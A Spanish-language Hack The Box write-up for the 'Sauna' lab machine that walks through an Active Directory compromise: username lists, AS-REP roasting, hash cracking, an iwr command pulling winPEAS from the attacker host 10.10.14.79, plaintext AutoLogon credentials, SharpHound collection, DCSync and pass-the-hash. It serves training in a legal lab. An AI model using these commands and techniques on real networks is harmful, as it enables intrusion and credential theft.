Post

Write Up - Hack The Box - Sauna

Write Up - Hack The Box - Sauna

Screenshot0

Resumen máquina

1
2
3
4
5
6
7
8
9
Information Leakage (Users) and create custom dictionary
Kerberos User Enumeration - Kerbrute
ASRepRoast Attack (GetNPUsers)
Cracking Hashes
System Enumeration - WinPEAS
AutoLogon Credentials
BloodHound - SharpHound.ps1
DCSync Attack - Secretsdump [Privilege Escalation]
PassTheHash

NMAP

Screenshot1

Enumeración

En /about.html encontramos una lista de potenciales usuarios del dominio

Screenshot2

Creamos un diccionario custom siguiendo el convenio tradicional de active directory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
fergus.smith
f.smith
fsmith
fergussmith
shaun.coins
s.coins
hugo.bear
h.bear
bowie.taylor
b.taylor
sophie.driver
s.driver
steven.kerb
s.kerb

Vemos que usuario es kerberosteable con kerbrute

Screenshot3

Con GetNPUsers obtenemos le hash RC4 (mas fácil de romper)

Screenshot4

Crackeamos el hash con *john fsmith:Thestrokes23

Screenshot5

validamos con netexec las credenciales

Screenshot6

enumeramos usuarios a nivel de dominio con rpcclient

Screenshot7

con winrm procedemos a conectarnos a la máquina victima

Screenshot9

Subimos WINPEAS a la máquina victima para enumerar posibles vectores de escalada de privilegios en el sistema

1
iwr -uri http://10.10.14.79/winPEASx64.exe -OutFile C:\Windows\Temp\temp\winPEAS.exe

Encontramos credenciales en texto claro abusando de Windows AutoLogon del usuario svc_loanmanager

svc_loanmanager:Moneymakestheworldgoround!

Screenshot10

Screenshot11

Bloodhound

Nos pasamos a la máquina victima SharpHound.ps1 y recolectamos toda la data para posteriormente pasarla a nuestra máquina y analizarla con bloodhound

1
2
3
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
download 20260411153624_BloodHound.zip bloodhound.zip

Screenshot12

DCSync

Screenshot13

Pass The Hash

Screenshot14

This post is licensed under CC BY 4.0 by the author.